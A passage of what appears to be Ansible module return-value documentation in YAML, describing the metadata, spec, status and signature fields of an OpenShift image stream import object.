Populated by the system when a graceful deletion is requested.
Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component that
will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to generate
a unique name ONLY IF the Name field has not been provided. If
this field is used, the name returned to the client will be different
than the name passed. This value will also be combined with a
unique suffix. The provided value has the same validation rules
as the Name field, and may be truncated by the length of the suffix
required to make the value unique on the server. If this field
is specified and the generated name exists, the server will NOT
return a 409 - instead, it will either return 201 Created or 500
with Reason ServerTimeout indicating a unique name could not be
found in the time allotted, and the client should retry (optionally
after the time indicated in the Retry-After header). Applied only
if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the desired
state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize and
categorize (scope and select) objects. May match selectors of
replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating
resources, although some resources may allow a client to request
the generation of an appropriate name automatically. Name is primarily
intended for creation idempotence and configuration definition.
Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must be unique. An
empty namespace is equivalent to the "default" namespace, but
"default" is the canonical representation. Not all objects are
required to be scoped to a namespace - the value of this field
for those objects will be empty. Must be a DNS_LABEL. Cannot be
updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in the
list have been deleted, this object will be garbage collected.
If this object is managed by a controller, then an entry in this
list will point to this controller, with the controller field
set to true. There cannot be more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this object
that can be used by clients to determine when objects have changed.
May be used for optimistic concurrency, change detection, and
the watch operation on a resource or set of resources. Clients
must treat these values as opaque and passed unmodified back to
the server. They may only be valid for a particular resource or
set of resources. Populated by the system. Read-only. Value must
be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the system.
Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object. It
is typically generated by the server on successful creation of
a resource and is not allowed to change on PUT operations. Populated
by the system. Read-only.
type: str
spec:
description:
- Spec describes the desired state of this stream
type: complex
contains:
docker_image_repository:
description:
- DockerImageRepository is optional, if specified this stream is
backed by a Docker repository on this server
type: str
tags:
description:
- Tags map arbitrary string values to specific image locators
type: list
contains:
_from:
description:
- From is a reference to an image stream tag or image stream
this tag should track
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire
object, this string should contain a valid JSON/Go field
access statement, such as desiredState.manifest.containers[2].
For example, if the object reference is to a container
within a pod, this would take on a value like: "spec.containers{name}"
(where "name" refers to the name of the container that
triggered the event) or if no container name is specified
"spec.containers[2]" (container with index 2 in this pod).
This syntax is chosen only to have some well-defined way
of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made,
if any.
type: str
uid:
description:
- UID of the referent.
type: str
annotations:
description:
- Annotations associated with images using this tag
type: complex
contains: str, str
generation:
description:
- Generation is the image stream generation that updated this
tag - setting it to 0 is an indication that the generation
must be updated. Legacy clients will send this as nil, which
means the client doesn't know or care.
type: int
import_policy:
description:
- Import is information that controls how images may be imported
by the server.
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate
verification or connect directly over HTTP during image
import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should
be periodically checked to ensure it is up to date, and
imported
type: bool
name:
description:
- Name of the tag
type: str
reference:
description:
- Reference states if the tag will be imported. Default value
is false, which means the tag will be imported.
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume
the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config
triggers or new builds. The default value is `Source`,
indicating the original location of the image should be
used (if imported). The user may also specify `Local`,
indicating that the pull spec should point to the integrated
Docker registry and leverage the registry's ability to
proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed
from the image stream's namespace, so others on the platform
can access a remote image but have no access to the remote
secret. It also allows the image layers to be mirrored
into the local registry from which the images can still be
pulled even if the upstream registry is unavailable.
type: str
status:
description:
- Status describes the current state of this stream
type: complex
contains:
docker_image_repository:
description:
- DockerImageRepository represents the effective location this stream
may be accessed at. May be empty until the server determines where
the repository is located
type: str
tags:
description:
- Tags are a historical record of images associated with each tag.
The first entry in the TagEvent array is the currently tagged
image.
type: list
contains:
conditions:
description:
- Conditions is an array of conditions that apply to the tag
event list.
type: list
contains:
generation:
description:
- Generation is the spec tag generation that this status
corresponds to
type: int
last_transition_time:
description:
- LastTransitionTime is the time the condition transitioned
from one status to another.
type: complex
contains: {}
message:
description:
- Message is a human readable description of the details
about last transition, complementing reason.
type: str
reason:
description:
- Reason is a brief machine readable explanation for the
condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of tag event condition, currently only ImportSuccess
type: str
items:
description:
- Standard object's metadata.
type: list
contains:
created:
description:
- Created holds the time the TagEvent was created
type: complex
contains: {}
docker_image_reference:
description:
- DockerImageReference is the string that can be used to
pull this image
type: str
generation:
description:
- Generation is the spec tag generation that resulted in
this tag being updated
type: int
image:
description:
- Image is the image
type: str
tag:
description:
- Tag is the tag for which the history is recorded
type: str
images:
description:
- Images is set with the result of importing spec.images
type: list
contains:
image:
description:
- Image is the metadata of that image, if the image was located
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
docker_image_config:
description:
- DockerImageConfig is a JSON blob that the runtime uses to set
up the container. This is a part of manifest schema v2.
type: str
docker_image_layers:
description:
- DockerImageLayers represents the layers in the image. May not
be set if the image does not define that data.
type: list
contains:
media_type:
description:
- MediaType of the referenced object.
type: str
name:
description:
- Name of the layer as defined by the underlying store.
type: str
size:
description:
- Size of the layer in bytes as defined by the underlying store.
type: int
docker_image_manifest:
description:
- DockerImageManifest is the raw JSON of the manifest
type: str
docker_image_manifest_media_type:
description:
- DockerImageManifestMediaType specifies the mediaType of manifest.
This is a part of manifest schema v2.
type: str
docker_image_metadata:
description:
- DockerImageMetadata contains metadata about this image
type: complex
contains:
raw:
description:
- Raw is the underlying serialization of this object.
type: str
docker_image_metadata_version:
description:
- DockerImageMetadataVersion conveys the version of the object,
which if empty defaults to "1.0"
type: str
docker_image_reference:
description:
- DockerImageReference is the string that can be used to pull this
image.
type: str
docker_image_signatures:
description:
- DockerImageSignatures provides the signatures as opaque blobs.
This is a part of manifest schema v1.
type: list
contains: str
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a
resource that may be set by external tools to store and retrieve
arbitrary metadata. They are not queryable and should be preserved
when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere right
now and apiserver is going to ignore it if set in create or
update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time
when this object was created. It is not guaranteed to be set
in happens-before order across separate operations. Clients
may not set this value. It is represented in RFC3339 form
and is in UTC. Populated by the system. Read-only. Null for
lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate
before it will be removed from the system. Only set when deletionTimestamp
is also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and is
not directly settable by a client. The resource is expected
to be deleted (no longer visible from resource lists, and
not reachable by name) after the time in this field. Once
set, this value may not be unset or be set further into the
future, although it may be shortened or the resource may be
deleted prior to this time. For example, a user may request
that a pod is deleted in 30 seconds. The Kubelet will react
by sending a graceful termination signal to the containers
in the pod. After that 30 seconds, the Kubelet will send a
hard termination signal (SIGKILL) to the container and after
cleanup, remove the pod from the API. In the presence of network
partitions, this object may still exist after this timestamp,
until an administrator or automated process can determine
the resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the system
when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only be
removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to
generate a unique name ONLY IF the Name field has not been
provided. If this field is used, the name returned to the
client will be different than the name passed. This value
will also be combined with a unique suffix. The provided value
has the same validation rules as the Name field, and may be
truncated by the length of the suffix required to make the
value unique on the server. If this field is specified and
the generated name exists, the server will NOT return a 409
- instead, it will either return 201 Created or 500 with Reason
ServerTimeout indicating a unique name could not be found
in the time allotted, and the client should retry (optionally
after the time indicated in the Retry-After header). Applied
only if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the
desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating
resources, although some resources may allow a client to request
the generation of an appropriate name automatically. Name
is primarily intended for creation idempotence and configuration
definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all objects
are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL.
Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in
the list have been deleted, this object will be garbage collected.
If this object is managed by a controller, then an entry in
this list will point to this controller, with the controller
field set to true. There cannot be more than one managing
controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this
object that can be used by clients to determine when objects
have changed. May be used for optimistic concurrency, change
detection, and the watch operation on a resource or set of
resources. Clients must treat these values as opaque and passed
unmodified back to the server. They may only be valid for
a particular resource or set of resources. Populated by the
system. Read-only. Value must be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful creation
of a resource and is not allowed to change on PUT operations.
Populated by the system. Read-only.
type: str
signatures:
description:
- Signatures holds all signatures of the image.
type: list
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
conditions:
description:
- Conditions represent the latest available observations of
a signature's current state.
type: list
contains:
last_probe_time:
description:
- Last time the condition was checked.
type: complex
contains: {}
last_transition_time:
description:
- Last time the condition transit from one status to another.
type: complex
contains: {}
message:
description:
- Human readable message indicating details about last transition.
type: str
reason:
description:
- (brief) reason for the condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of signature condition, Complete or Failed.
type: str
content:
description:
- "Required: An opaque binary string which is an image's signature."
type: str
created:
description:
- If specified, it is the time of signature's creation.
type: complex
contains: {}
image_identity:
description:
- A human readable string representing image's identity. It
could be a product name and version, or an image pull spec
(e.g. "registry.access.redhat.com/rhel7/rhel:7.2").
type: str
issued_by:
description:
- If specified, it holds information about an issuer of signing
certificate or key (a person or entity who signed the signing
certificate or key).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
issued_to:
description:
- If specified, it holds information about a subject of signing
certificate or key (a person or entity who signed the image).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
public_key_id:
description:
- If present, it is a human readable key id of public key
belonging to the subject used to verify image signature.
It should contain at least 64 lowest bits of public key's
fingerprint (e.g. 0x685ebe62bf278440).
type: str
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with
a resource that may be set by external tools to store
and retrieve arbitrary metadata. They are not queryable
and should be preserved when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere
right now and apiserver is going to ignore it if set in
create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server
time when this object was created. It is not guaranteed
to be set in happens-before order across separate operations.
Clients may not set this value. It is represented in RFC3339
form and is in UTC. Populated by the system. Read-only.
Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system. Only
set when deletionTimestamp is also set. May only be shortened.
Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and
is not directly settable by a client. The resource is
expected to be deleted (no longer visible from resource
lists, and not reachable by name) after the time in this
field. Once set, this value may not be unset or be set
further into the future, although it may be shortened
or the resource may be deleted prior to this time. For
example, a user may request that a pod is deleted in 30
seconds. The Kubelet will react by sending a graceful
termination signal to the containers in the pod. After
that 30 seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup, remove
the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until
an administrator or automated process can determine the
resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the
system when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only
be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has not
been provided. If this field is used, the name returned
to the client will be different than the name passed.
This value will also be combined with a unique suffix.
The provided value has the same validation rules as the
Name field, and may be truncated by the length of the
suffix required to make the value unique on the server.
If this field is specified and the generated name exists,
the server will NOT return a 409 - instead, it will either
return 201 Created or 500 with Reason ServerTimeout indicating
a unique name could not be found in the time allotted,
and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if
Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of
the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when
creating resources, although some resources may allow
a client to request the generation of an appropriate name
automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all
objects are required to be scoped to a namespace - the
value of this field for those objects will be empty. Must
be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be garbage
collected. If this object is managed by a controller,
then an entry in this list will point to this controller,
with the controller field set to true. There cannot be
more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of
this object that can be used by clients to determine when
objects have changed. May be used for optimistic concurrency,
change detection, and the watch operation on a resource
or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They
may only be valid for a particular resource or set of
resources. Populated by the system. Read-only. Value must
be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful
creation of a resource and is not allowed to change on
PUT operations. Populated by the system. Read-only.
type: str
signed_claims:
description:
- Contains claims from the signature.
type: complex
contains: str, str
type:
description:
- 'Required: Describes a type of stored blob.'
type: str
status:
description:
- Status is the status of the image import, including errors encountered
while retrieving the image
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may define
its own extended details. This field is optional and the data
returned is not guaranteed to conform to any schema except that
defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with the
StatusReason failure. Not all StatusReasons may provide detailed
causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot and
postfix notation for nested attributes. Arrays are zero-indexed.
Fields may appear more than once in an array of causes
due to fields having multiple errors. Optional. Examples:
"name" - the field "name" on the current resource "items[0].name"
- the field "name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the error.
If this value is empty there is no information available.
type: str
group:
description:
- The group attribute of the resource associated with the status
StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the status
StatusReason. On some operations may differ from the requested
resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the status
StatusReason (when there is a single name which can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation should
be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of this
object that can be used by clients to determine when objects
have changed. Value must be treated as opaque by clients and
passed unmodified back to the server. Populated by the system.
Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in the
"Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does not
override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
tag:
description:
- Tag is the tag this image was located under, if any
type: str
repository:
description:
- Repository is set if spec.repository was set to the outcome of the import
type: complex
contains:
additional_tags:
description:
- AdditionalTags are tags that exist in the repository but were not
imported because a maximum limit of automatic imports was applied.
type: list
contains: str
images:
description:
- Images is a list of images successfully retrieved by the import of
the repository.
type: list
contains:
image:
description:
- Image is the metadata of that image, if the image was located
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
docker_image_config:
description:
- DockerImageConfig is a JSON blob that the runtime uses to
set up the container. This is a part of manifest schema v2.
type: str
docker_image_layers:
description:
- DockerImageLayers represents the layers in the image. May
not be set if the image does not define that data.
type: list
contains:
media_type:
description:
- MediaType of the referenced object.
type: str
name:
description:
- Name of the layer as defined by the underlying store.
type: str
size:
description:
- Size of the layer in bytes as defined by the underlying
store.
type: int
docker_image_manifest:
description:
- DockerImageManifest is the raw JSON of the manifest
type: str
docker_image_manifest_media_type:
description:
- DockerImageManifestMediaType specifies the mediaType of manifest.
This is a part of manifest schema v2.
type: str
docker_image_metadata:
description:
- DockerImageMetadata contains metadata about this image
type: complex
contains:
raw:
description:
- Raw is the underlying serialization of this object.
type: str
docker_image_metadata_version:
description:
- DockerImageMetadataVersion conveys the version of the object,
which if empty defaults to "1.0"
type: str
docker_image_reference:
description:
- DockerImageReference is the string that can be used to pull
this image.
type: str
docker_image_signatures:
description:
- DockerImageSignatures provides the signatures as opaque blobs.
This is a part of manifest schema v1.
type: list
contains: str
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with
a resource that may be set by external tools to store
and retrieve arbitrary metadata. They are not queryable
and should be preserved when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere
right now and apiserver is going to ignore it if set in
create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server
time when this object was created. It is not guaranteed
to be set in happens-before order across separate operations.
Clients may not set this value. It is represented in RFC3339
form and is in UTC. Populated by the system. Read-only.
Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system. Only
set when deletionTimestamp is also set. May only be shortened.
Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and
is not directly settable by a client. The resource is
expected to be deleted (no longer visible from resource
lists, and not reachable by name) after the time in this
field. Once set, this value may not be unset or be set
further into the future, although it may be shortened
or the resource may be deleted prior to this time. For
example, a user may request that a pod is deleted in 30
seconds. The Kubelet will react by sending a graceful
termination signal to the containers in the pod. After
that 30 seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup, remove
the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until
an administrator or automated process can determine the
resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the
system when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only
be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has not
been provided. If this field is used, the name returned
to the client will be different than the name passed.
This value will also be combined with a unique suffix.
The provided value has the same validation rules as the
Name field, and may be truncated by the length of the
suffix required to make the value unique on the server.
If this field is specified and the generated name exists,
the server will NOT return a 409 - instead, it will either
return 201 Created or 500 with Reason ServerTimeout indicating
a unique name could not be found in the time allotted,
and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if
Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of
the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when
creating resources, although some resources may allow
a client to request the generation of an appropriate name
automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all
objects are required to be scoped to a namespace - the
value of this field for those objects will be empty. Must
be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be garbage
collected. If this object is managed by a controller,
then an entry in this list will point to this controller,
with the controller field set to true. There cannot be
more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of
this object that can be used by clients to determine when
objects have changed. May be used for optimistic concurrency,
change detection, and the watch operation on a resource
or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They
may only be valid for a particular resource or set of
resources. Populated by the system. Read-only. Value must
be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful
creation of a resource and is not allowed to change on
PUT operations. Populated by the system. Read-only.
type: str
signatures:
description:
- Signatures holds all signatures of the image.
type: list
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas
to the latest internal value, and may reject unrecognized
values.
type: str
conditions:
description:
- Conditions represent the latest available observations
of a signature's current state.
type: list
contains:
last_probe_time:
description:
- Last time the condition was checked.
type: complex
contains: {}
last_transition_time:
description:
- Last time the condition transitioned from one status to
another.
type: complex
contains: {}
message:
description:
- Human readable message indicating details about last
transition.
type: str
reason:
description:
- (brief) reason for the condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of signature condition, Complete or Failed.
type: str
content:
description:
- "Required: An opaque binary string which is an image's\
\ signature."
type: str
created:
description:
- If specified, it is the time of signature's creation.
type: complex
contains: {}
image_identity:
description:
- A human readable string representing image's identity.
It could be a product name and version, or an image pull
spec (e.g. "registry.access.redhat.com/rhel7/rhel:7.2").
type: str
issued_by:
description:
- If specified, it holds information about an issuer of
signing certificate or key (a person or entity who signed
the signing certificate or key).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
issued_to:
description:
- If specified, it holds information about a subject of
signing certificate or key (a person or entity who signed
the image).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
public_key_id:
description:
- If present, it is a human readable key id of public
key belonging to the subject used to verify image
signature. It should contain at least 64 lowest bits
of public key's fingerprint (e.g. 0x685ebe62bf278440).
type: str
kind:
description:
- Kind is a string value representing the REST resource
this object represents. Servers may infer this from the
endpoint the client submits requests to. Cannot be updated.
In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored
with a resource that may be set by external tools
to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying
objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to.
This is used to distinguish resources with same name
and namespace in different clusters. This field is
not set anywhere right now and apiserver is going
to ignore it if set in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the
server time when this object was created. It is not
guaranteed to be set in happens-before order across
separate operations. Clients may not set this value.
It is represented in RFC3339 form and is in UTC. Populated
by the system. Read-only. Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system.
Only set when deletionTimestamp is also set. May only
be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which
this resource will be deleted. This field is set by
the server when a graceful deletion is requested by
the user, and is not directly settable by a client.
The resource is expected to be deleted (no longer
visible from resource lists, and not reachable by
name) after the time in this field. Once set, this
value may not be unset or be set further into the
future, although it may be shortened or the resource
may be deleted prior to this time. For example, a
user may request that a pod is deleted in 30 seconds.
The Kubelet will react by sending a graceful termination
signal to the containers in the pod. After that 30
seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup,
remove the pod from the API. In the presence of network
partitions, this object may still exist after this
timestamp, until an administrator or automated process
can determine the resource is fully terminated. If
not set, graceful deletion of the object has not been
requested. Populated by the system when a graceful
deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the
registry. Each entry is an identifier for the responsible
component that will remove the entry from the list.
If the deletionTimestamp of the object is non-nil,
entries in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has
not been provided. If this field is used, the name
returned to the client will be different than the
name passed. This value will also be combined with
a unique suffix. The provided value has the same validation
rules as the Name field, and may be truncated by the
length of the suffix required to make the value unique
on the server. If this field is specified and the
generated name exists, the server will NOT return
a 409 - instead, it will either return 201 Created
or 500 with Reason ServerTimeout indicating a unique
name could not be found in the time allotted, and
the client should retry (optionally after the time
indicated in the Retry-After header). Applied only
if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation
of the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to
organize and categorize (scope and select) objects.
May match selectors of replication controllers and
services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required
when creating resources, although some resources may
allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for
creation idempotence and configuration definition.
Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must
be unique. An empty namespace is equivalent to the
"default" namespace, but "default" is the canonical
representation. Not all objects are required to be
scoped to a namespace - the value of this field for
those objects will be empty. Must be a DNS_LABEL.
Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be
garbage collected. If this object is managed by a
controller, then an entry in this list will point
to this controller, with the controller field set
to true. There cannot be more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing
controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version
of this object that can be used by clients to determine
when objects have changed. May be used for optimistic
concurrency, change detection, and the watch operation
on a resource or set of resources. Clients must treat
these values as opaque and passed unmodified back
to the server. They may only be valid for a particular
resource or set of resources. Populated by the system.
Read-only. Value must be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this
object. It is typically generated by the server on
successful creation of a resource and is not allowed
